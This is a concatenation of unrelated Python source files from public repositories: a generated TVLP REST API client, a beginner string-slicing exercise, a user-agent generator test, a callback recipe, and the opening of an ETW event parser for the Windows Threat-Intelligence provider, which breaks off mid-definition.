_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_tvlp_configurations(self, **kwargs): # noqa: E501
"""List TVLP configurations # noqa: E501
The `tvlp` endpoint returns all of the TVLP configurations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tvlp_configurations(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TvlpConfiguration]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_tvlp_configurations_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_tvlp_configurations_with_http_info(**kwargs) # noqa: E501
return data
def list_tvlp_configurations_with_http_info(self, **kwargs): # noqa: E501
"""List TVLP configurations # noqa: E501
The `tvlp` endpoint returns all of the TVLP configurations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tvlp_configurations_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TvlpConfiguration]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_tvlp_configurations" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TvlpConfiguration]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_tvlp_results(self, **kwargs): # noqa: E501
"""List TVLP results # noqa: E501
The `tvlp-results` endpoint returns all of the results produced by running TVLP configurations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tvlp_results(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TvlpResult]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_tvlp_results_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_tvlp_results_with_http_info(**kwargs) # noqa: E501
return data
def list_tvlp_results_with_http_info(self, **kwargs): # noqa: E501
"""List TVLP results # noqa: E501
The `tvlp-results` endpoint returns all of the results produced by running TVLP configurations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tvlp_results_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TvlpResult]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_tvlp_results" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp-results', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TvlpResult]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def start_tvlp_configuration(self, id, **kwargs): # noqa: E501
"""Start a TVLP configuration # noqa: E501
Start an existing TVLP configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_tvlp_configuration(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:param TvlpStartConfiguration start: TVLP Start parameters
:return: TvlpResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.start_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.start_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
return data
def start_tvlp_configuration_with_http_info(self, id, **kwargs): # noqa: E501
"""Start a TVLP configuration # noqa: E501
Start an existing TVLP configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_tvlp_configuration_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:param TvlpStartConfiguration start: TVLP Start parameters
:return: TvlpResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'start'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method start_tvlp_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `start_tvlp_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'start' in params:
body_params = params['start']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp/{id}/start', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TvlpResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def stop_tvlp_configuration(self, id, **kwargs): # noqa: E501
"""Stop a TVLP configuration # noqa: E501
Stop a running TVLP configuration. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.stop_tvlp_configuration(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.stop_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.stop_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
return data
def stop_tvlp_configuration_with_http_info(self, id, **kwargs): # noqa: E501
"""Stop a TVLP configuration # noqa: E501
Stop a running TVLP configuration. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.stop_tvlp_configuration_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method stop_tvlp_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `stop_tvlp_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp/{id}/stop', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
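# A minimal usage sketch for the client methods above. Everything named here
# is an assumption for illustration: the enclosing class name (TvlpApi), the
# package name (client), and the service address do not appear in this file;
# they follow the usual swagger-codegen layout.
#
# from client import ApiClient, Configuration
# from client.api import TvlpApi
#
# configuration = Configuration()
# configuration.host = "http://localhost:9000"   # assumed service address
# api = TvlpApi(ApiClient(configuration))
#
# # Synchronous call: returns list[TvlpConfiguration] directly.
# configs = api.list_tvlp_configurations()
#
# # Asynchronous call: returns a thread-like handle; .get() blocks for data.
# thread = api.get_tvlp_configuration(configs[0].id, async_req=True)
# config = thread.get()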
[per-file metrics and quality-signal columns omitted]
ad76edca5247bb44331d9f3d8b47b2d7fbcde7da | 37 | py | Python | CodeUP/Python basic 100/6022.py | cmsong111/NJ_code | 2df6176d179e168a2789a825ddeb977a82eb8d97 | ["MIT"] | null | null | null
s=input()
print(s[:2],s[2:4],s[4:6])
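# Example run (hypothetical input): entering "991231" prints "99 12 31",
# splitting a six-character date string into year, month, and day slices.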
[per-file metrics and quality-signal columns omitted]
ad83e06fa8f1c8cf4eadc2c08bcc0419202d0d94 | 760 | py | Python | tests/test_user_agent.py | fujiawei-dev/tookit-py | 5ab3a18a41885f6166150cc27183621b96f8f991 | ["BSD-3-Clause"] | null | null | null
from user_agent.generate import Browser, OS, generate_user_agent
def test_generate_user_agent():
print(generate_user_agent())
print(generate_user_agent(OS.Windows, platform=None))
print(generate_user_agent(OS.Linux, platform=None))
print(generate_user_agent(OS.Mac, platform=None))
print(generate_user_agent(OS.IOS, platform=None))
print(generate_user_agent(OS.Android, platform=None))
print(generate_user_agent(browser=Browser.Safari, platform=None))
print(generate_user_agent(browser=Browser.Chrome, platform=None))
print(generate_user_agent(browser=Browser.Firefox, platform=None))
print(generate_user_agent(browser=Browser.Opera, platform=None))
print(generate_user_agent(browser=Browser.Edge, platform=None))
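# A short sketch of how the generator might be used outside the test
# (assumes the third-party `requests` package; not part of this test file):
#
# import requests
# from user_agent.generate import generate_user_agent
#
# resp = requests.get(
#     "https://httpbin.org/user-agent",
#     headers={"User-Agent": generate_user_agent()},
# )
# print(resp.json())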
[per-file metrics and quality-signal columns omitted]
ad9d727aa59e2cd0e0826e3e31f883ec3007b0b4 | 238 | py | Python | recipes/Python/66521_Avoiding_lambdwriting_callback/recipe-66521.py | tdiprima/code | 61a74f5f93da087d27c70b2efe779ac6bd2a3b4f | ["MIT"] | stars: 2,023 (2017-07-29T09:34:46.000Z to 2022-03-24T08:00:45.000Z) | issues: 32 via unhacker/code @ 73b09edc1b9850c557a79296655f140ce5e853db (2017-09-02T17:20:08.000Z to 2022-02-11T17:49:37.000Z) | forks: 780 via unhacker/code (2017-07-28T19:23:28.000Z to 2022-03-25T20:39:41.000Z)
class Command:
def __init__(self, callback, *args, **kwargs):
self.callback = callback
self.args = args
self.kwargs = kwargs
    def __call__(self):
        # Invoke the stored callback with the bound positional and keyword
        # arguments (the apply() builtin this recipe used was removed in
        # Python 3).
        return self.callback(*self.args, **self.kwargs)
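# Usage sketch (illustrative; `greet` is a hypothetical callback): Command
# freezes arguments now and invokes the callback later, which is the recipe's
# way of avoiding a lambda in callback-style APIs.
def greet(name, punctuation="!"):
    return "Hello, %s%s" % (name, punctuation)

cmd = Command(greet, "world", punctuation="?")
print(cmd())  # -> Hello, world?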
[per-file metrics and quality-signal columns omitted]
d1240782072c124b372f24e435b3ad3a747b3b2f | 31,194 | py | Python | etl/parsers/etw/Microsoft_Windows_Threat_Intelligence.py | IMULMUL/etl-parser | 76b7c046866ce0469cd129ee3f7bb3799b34e271 | ["Apache-2.0"] | stars: 104 (2020-03-04T14:31:31.000Z to 2022-03-28T02:59:36.000Z) | issues: 7 (2020-04-20T09:18:39.000Z to 2022-03-19T17:06:19.000Z) | forks: 16 (2020-03-05T18:55:59.000Z to 2022-03-01T10:19:28.000Z)
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-Threat-Intelligence
GUID : f4e1897c-bb5d-5668-f1d8-040f4d8dd344
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=1, version=0)
class Microsoft_Windows_Threat_Intelligence_1_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=2, version=0)
class Microsoft_Windows_Threat_Intelligence_2_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"ProtectionMask" / Int32ul,
"LastProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=3, version=0)
class Microsoft_Windows_Threat_Intelligence_3_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"ViewSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=4, version=0)
class Microsoft_Windows_Threat_Intelligence_4_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"TargetThreadAlertable" / Int8ul,
"ApcRoutine" / Int64ul,
"ApcArgument1" / Int64ul,
"ApcArgument2" / Int64ul,
"ApcArgument3" / Int64ul,
"RealEventTime" / Int64ul,
"ApcRoutineVadQueryResult" / Int32ul,
"ApcRoutineVadAllocationBase" / Int64ul,
"ApcRoutineVadAllocationProtect" / Int32ul,
"ApcRoutineVadRegionType" / Int32ul,
"ApcRoutineVadRegionSize" / Int64ul,
"ApcRoutineVadCommitSize" / Int64ul,
"ApcRoutineVadMmfName" / WString,
"ApcArgument1VadQueryResult" / Int32ul,
"ApcArgument1VadAllocationBase" / Int64ul,
"ApcArgument1VadAllocationProtect" / Int32ul,
"ApcArgument1VadRegionType" / Int32ul,
"ApcArgument1VadRegionSize" / Int64ul,
"ApcArgument1VadCommitSize" / Int64ul,
"ApcArgument1VadMmfName" / WString
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=5, version=0)
class Microsoft_Windows_Threat_Intelligence_5_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul,
"ContextFlags" / Int32ul,
"ContextMask" / Int16ul,
"Pc" / Int64ul,
"Sp" / Int64ul,
"Lr" / Int64ul,
"Fp" / Int64ul,
"Reg0" / Int64ul,
"Reg1" / Int64ul,
"Reg2" / Int64ul,
"Reg3" / Int64ul,
"Reg4" / Int64ul,
"Reg5" / Int64ul,
"Reg6" / Int64ul,
"Reg7" / Int64ul,
"RealEventTime" / Int64ul,
"PcVadQueryResult" / Int32ul,
"PcVadAllocationBase" / Int64ul,
"PcVadAllocationProtect" / Int32ul,
"PcVadRegionType" / Int32ul,
"PcVadRegionSize" / Int64ul,
"PcVadCommitSize" / Int64ul,
"PcVadMmfName" / WString
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=6, version=0)
class Microsoft_Windows_Threat_Intelligence_6_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=7, version=0)
class Microsoft_Windows_Threat_Intelligence_7_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"ProtectionMask" / Int32ul,
"LastProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=8, version=0)
class Microsoft_Windows_Threat_Intelligence_8_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"ViewSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=11, version=0)
class Microsoft_Windows_Threat_Intelligence_11_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"BytesCopied" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=12, version=0)
class Microsoft_Windows_Threat_Intelligence_12_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"BytesCopied" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=13, version=0)
class Microsoft_Windows_Threat_Intelligence_13_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"BytesCopied" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=14, version=0)
class Microsoft_Windows_Threat_Intelligence_14_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"BytesCopied" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=15, version=0)
class Microsoft_Windows_Threat_Intelligence_15_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=16, version=0)
class Microsoft_Windows_Threat_Intelligence_16_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=17, version=0)
class Microsoft_Windows_Threat_Intelligence_17_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=18, version=0)
class Microsoft_Windows_Threat_Intelligence_18_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
